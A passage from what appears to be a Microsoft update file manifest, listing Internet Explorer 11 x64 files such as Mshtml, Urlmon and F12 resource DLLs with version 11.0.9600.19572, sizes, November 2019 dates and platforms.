11.0.9600.19572| 285,184| 23-Nov-2019| 08:03| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 295,424| 23-Nov-2019| 08:04| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 297,472| 23-Nov-2019| 08:05| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,864| 23-Nov-2019| 08:06| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 295,424| 23-Nov-2019| 08:07| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 294,400| 23-Nov-2019| 08:08| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 294,400| 23-Nov-2019| 08:08| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,864| 23-Nov-2019| 08:09| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 23-Nov-2019| 08:10| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 288,768| 23-Nov-2019| 08:11| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 286,208| 23-Nov-2019| 08:11| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 281,600| 23-Nov-2019| 08:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 286,720| 23-Nov-2019| 08:13| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,352| 23-Nov-2019| 08:14| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 242,176| 23-Nov-2019| 08:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 243,200| 23-Nov-2019| 08:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 243,200| 23-Nov-2019| 08:16| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 61,440| 23-Nov-2019| 07:48| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 73,728| 23-Nov-2019| 07:49| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 67,584| 23-Nov-2019| 07:50| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 67,584| 23-Nov-2019| 07:51| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 74,240| 23-Nov-2019| 07:52| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 78,848| 23-Nov-2019| 07:52| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 61,440| 23-Nov-2019| 08:45| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 74,752| 23-Nov-2019| 07:53| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 62,464| 23-Nov-2019| 07:54| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,096| 23-Nov-2019| 07:55| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 75,264| 23-Nov-2019| 07:56| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 61,440| 23-Nov-2019| 07:57| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,608| 23-Nov-2019| 07:57| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 72,192| 23-Nov-2019| 07:58| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 73,216| 23-Nov-2019| 07:59| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 41,472| 23-Nov-2019| 08:00| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 37,888| 23-Nov-2019| 08:01| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,608| 23-Nov-2019| 08:02| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 67,584| 23-Nov-2019| 08:02| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 65,536| 23-Nov-2019| 08:03| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 74,240| 23-Nov-2019| 08:04| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 70,656| 23-Nov-2019| 08:05| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 71,168| 23-Nov-2019| 08:06| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 71,680| 23-Nov-2019| 08:06| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 71,168| 23-Nov-2019| 08:07| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 69,632| 23-Nov-2019| 08:08| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,096| 23-Nov-2019| 08:09| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,608| 23-Nov-2019| 08:10| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 68,096| 23-Nov-2019| 08:10| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 65,536| 23-Nov-2019| 08:12| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 59,904| 23-Nov-2019| 08:12| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 65,536| 23-Nov-2019| 08:13| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 69,120| 23-Nov-2019| 08:14| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 08:15| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 08:15| Not applicable \nF12resources.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 08:16| Not applicable \nJavascriptcollectionagent.dll| 11.0.9600.19572| 77,824| 19-Nov-2019| 20:01| x64 \nDiagnosticshub.scriptedsandboxplugin.dll| 11.0.9600.19572| 276,480| 19-Nov-2019| 20:02| x64 \nUrlmon.dll.mui| 11.0.9600.19572| 46,080| 23-Nov-2019| 07:48| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:49| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 07:50| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 07:51| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:52| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 07:52| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 08:45| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:53| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 07:54| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:55| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:56| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 45,056| 23-Nov-2019| 07:56| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:57| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:58| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 07:59| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 39,936| 23-Nov-2019| 08:00| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 08:01| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 08:01| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 08:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 08:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 08:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 08:05| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 08:06| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 08:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 08:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 08:08| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 08:09| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 08:10| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 08:10| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 08:11| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 08:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 08:13| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 08:14| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 08:15| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 08:15| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 08:16| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 07:48| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:49| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:50| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 07:51| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:52| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 11,264| 23-Nov-2019| 07:53| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 08:45| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:53| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:55| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:55| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:56| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,216| 23-Nov-2019| 07:56| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:57| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 07:58| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:59| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 7,680| 23-Nov-2019| 08:00| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 7,680| 23-Nov-2019| 08:01| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 08:01| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 08:02| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 08:03| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 08:04| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 08:04| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:06| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:06| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 08:08| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 08:08| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:09| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 08:10| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 08:11| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 08:11| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 9,728| 23-Nov-2019| 08:12| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 08:13| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 10,240| 23-Nov-2019| 08:14| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 6,656| 23-Nov-2019| 08:15| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 6,656| 23-Nov-2019| 08:15| Not applicable \nOccache.dll.mui| 11.0.9600.19572| 6,656| 23-Nov-2019| 08:16| Not applicable \nJsproxy.dll| 11.0.9600.19572| 54,784| 19-Nov-2019| 20:22| x64 \nWininet.dll| 11.0.9600.19572| 4,859,392| 19-Nov-2019| 19:26| x64 \nInetcpl.cpl.mui| 11.0.9600.19572| 114,176| 23-Nov-2019| 07:48| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,560| 23-Nov-2019| 07:49| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,928| 23-Nov-2019| 07:50| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 122,880| 23-Nov-2019| 07:51| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,048| 23-Nov-2019| 07:52| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 138,240| 23-Nov-2019| 07:52| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 114,688| 23-Nov-2019| 08:45| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 131,584| 23-Nov-2019| 07:53| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 117,760| 23-Nov-2019| 07:54| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 122,368| 23-Nov-2019| 07:55| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 134,144| 23-Nov-2019| 07:56| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 107,008| 23-Nov-2019| 07:57| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,392| 23-Nov-2019| 07:57| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 127,488| 23-Nov-2019| 07:58| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 128,512| 23-Nov-2019| 07:59| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 88,576| 23-Nov-2019| 08:00| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 82,944| 23-Nov-2019| 08:01| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,440| 23-Nov-2019| 08:02| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,392| 23-Nov-2019| 08:02| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 120,320| 23-Nov-2019| 08:03| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,560| 23-Nov-2019| 08:04| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 08:05| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,952| 23-Nov-2019| 08:06| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 08:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 128,000| 23-Nov-2019| 08:08| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 08:08| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 08:09| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 08:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,416| 23-Nov-2019| 08:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 121,856| 23-Nov-2019| 08:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 115,712| 23-Nov-2019| 08:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 08:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,440| 23-Nov-2019| 08:14| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 72,704| 23-Nov-2019| 08:14| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 73,728| 23-Nov-2019| 08:15| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 73,728| 23-Nov-2019| 08:16| Not applicable \nIedkcs32.dll| 18.0.9600.19572| 390,752| 23-Nov-2019| 07:48| x64 \nInstall.ins| Not applicable| 464| 19-Nov-2019| 17:27| Not applicable \nIeapfltr.dat| 10.0.9301.0| 616,104| 13-Sep-2019| 18:14| Not applicable \nIeapfltr.dll| 11.0.9600.19572| 800,768| 19-Nov-2019| 19:04| x64 \nTdc.ocx| 11.0.9600.19572| 87,552| 19-Nov-2019| 20:00| x64 \nDiagnosticshub.datawarehouse.dll| 11.0.9600.19572| 666,624| 19-Nov-2019| 20:33| x64 \nIedvtool.dll| 11.0.9600.19572| 950,784| 19-Nov-2019| 20:56| x64 \nDiagnosticshub_is.dll| 11.0.9600.19572| 50,176| 19-Nov-2019| 20:36| x64 \nDxtmsft.dll| 11.0.9600.19572| 489,984| 19-Nov-2019| 20:07| x64 \nDxtrans.dll| 11.0.9600.19572| 315,392| 19-Nov-2019| 19:54| x64 \nMicrosoft-windows-ie-f12-provider.ptxml| Not applicable| 11,892| 19-Nov-2019| 17:30| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:48| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:49| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:50| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:51| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:52| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:52| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:45| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:53| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:54| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:55| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:56| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:56| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:57| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:58| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 07:59| Not applicable \nF12.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 08:00| Not applicable \nF12.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 08:01| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:01| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:02| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:03| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:04| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:05| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:06| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:06| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:07| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:08| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:09| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:10| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:11| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:11| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:12| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:13| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 23-Nov-2019| 08:14| Not applicable \nF12.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 08:14| Not applicable \nF12.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 08:15| Not applicable \nF12.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 08:16| Not applicable \nDiagnosticstap.dll| 11.0.9600.19572| 244,224| 19-Nov-2019| 20:05| x64 \nF12resources.dll| 11.0.9600.19572| 10,949,120| 19-Nov-2019| 20:39| x64 \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:48| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:49| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:50| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:51| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:52| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:53| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:45| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:53| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:54| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:55| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:56| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:56| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:57| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:58| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 07:59| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:00| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:01| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:02| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:02| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:03| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:04| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:05| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:06| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:07| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:07| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:08| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:09| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:10| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:10| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:12| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:12| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:13| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:14| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:15| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:16| Not applicable \nF12tools.dll.mui| 11.0.9600.19572| 2,048| 23-Nov-2019| 08:16| Not applicable \nF12tools.dll| 11.0.9600.19572| 372,224| 19-Nov-2019| 20:04| x64 \nF12.dll| 11.0.9600.19572| 1,421,312| 19-Nov-2019| 19:50| x64 \nMsfeeds.dll| 11.0.9600.19572| 809,472| 19-Nov-2019| 19:41| x64 \nMsfeeds.mof| Not applicable| 1,518| 19-Nov-2019| 17:43| Not applicable \nHtml.iec| 2019.0.0.19572| 417,280| 19-Nov-2019| 20:29| Not applicable \nMshtmled.dll| 11.0.9600.19572| 92,160| 19-Nov-2019| 19:56| x64 \nMshtmlmedia.dll| 11.0.9600.19572| 1,359,360| 19-Nov-2019| 19:39| x64 \nMicrosoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 19-Nov-2019| 17:31| Not applicable \nMshtml.dll| 11.0.9600.19572| 25,753,088| 19-Nov-2019| 20:56| x64 \nMshtml.tlb| 11.0.9600.19572| 2,724,864| 19-Nov-2019| 20:44| Not applicable \nIeetwcollector.exe| 11.0.9600.19572| 116,224| 19-Nov-2019| 20:18| x64 \nIeetwcollectorres.dll| 11.0.9600.19572| 4,096| 19-Nov-2019| 20:44| x64 \nIeetwproxystub.dll| 11.0.9600.19572| 48,640| 19-Nov-2019| 20:29| x64 \nIelowutil.exe| 11.0.9600.19572| 222,720| 19-Nov-2019| 20:20| x64 \nIeproxy.dll| 11.0.9600.19572| 805,376| 19-Nov-2019| 19:00| x64 \nIeshims.dll| 11.0.9600.19572| 386,560| 19-Nov-2019| 19:08| x64 \nBing.ico| Not applicable| 5,430| 13-Sep-2019| 18:14| Not applicable \nIeunatt.exe| 11.0.9600.19572| 144,384| 19-Nov-2019| 20:18| x64 \nMicrosoft-windows-ie-internetexplorer-ppdlic.xrm-ms| Not applicable| 2,956| 24-Nov-2019| 00:09| Not applicable \nWindows feed discovered.wav| Not applicable| 19,884| 13-Sep-2019| 18:15| Not applicable \nWindows information bar.wav| Not applicable| 23,308| 13-Sep-2019| 18:15| Not applicable \nWindows navigation start.wav| Not applicable| 11,340| 13-Sep-2019| 18:15| Not applicable \nWindows pop-up blocked.wav| Not applicable| 85,548| 13-Sep-2019| 18:15| Not applicable \nJsprofilerui.dll| 11.0.9600.19572| 628,736| 19-Nov-2019| 19:57| x64 \nMemoryanalyzer.dll| 11.0.9600.19572| 1,862,144| 19-Nov-2019| 20:16| x64 \nMshtmldac.dll| 11.0.9600.19572| 88,064| 19-Nov-2019| 20:29| x64 \nNetworkinspection.dll| 11.0.9600.19572| 1,217,024| 19-Nov-2019| 19:51| x64 \nDesktop.ini| Not applicable| 65| 13-Sep-2019| 18:14| Not applicable \nOccache.dll| 11.0.9600.19572| 152,064| 19-Nov-2019| 19:52| x64 \nDesktop.ini| Not applicable| 65| 13-Sep-2019| 18:14| Not applicable \nWebcheck.dll| 11.0.9600.19572| 262,144| 19-Nov-2019| 19:43| x64 \nIcrav03.rat| Not applicable| 8,798| 13-Sep-2019| 18:14| Not applicable \nMsrating.dll| 11.0.9600.19572| 199,680| 19-Nov-2019| 19:56| x64 \nTicrf.rat| Not applicable| 1,988| 13-Sep-2019| 18:14| Not applicable \nIertutil.dll| 11.0.9600.19572| 2,910,720| 19-Nov-2019| 20:31| x64 \nSqmapi.dll| 6.2.9200.16384| 286,304| 23-Nov-2019| 07:48| x64 \nIe4uinit.exe| 11.0.9600.19572| 728,064| 19-Nov-2019| 19:41| x64 \nIernonce.dll| 11.0.9600.19572| 34,304| 19-Nov-2019| 20:21| x64 \nIesetup.dll| 11.0.9600.19572| 66,560| 19-Nov-2019| 20:30| x64 \nInseng.dll| 11.0.9600.19572| 107,520| 19-Nov-2019| 20:00| x64 \nTimeline.dll| 11.0.9600.19572| 219,136| 19-Nov-2019| 19:59| x64 \nTimeline.cpu.xml| Not applicable| 3,197| 13-Sep-2019| 18:14| Not applicable \nTimeline_is.dll| 11.0.9600.19572| 171,520| 19-Nov-2019| 20:22| x64 \nVgx.dll| 11.0.9600.19572| 1,018,368| 19-Nov-2019| 19:56| x64 \nIeframe.dll.mui| 11.0.9600.19572| 2,066,432| 23-Nov-2019| 07:49| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:49| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,120,704| 23-Nov-2019| 07:50| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:49| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,075,136| 23-Nov-2019| 07:50| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:50| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,063,360| 23-Nov-2019| 07:51| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:51| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,313,728| 23-Nov-2019| 07:52| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,390,016| 23-Nov-2019| 07:53| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:53| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,032,640| 23-Nov-2019| 08:45| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,307,584| 23-Nov-2019| 07:54| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 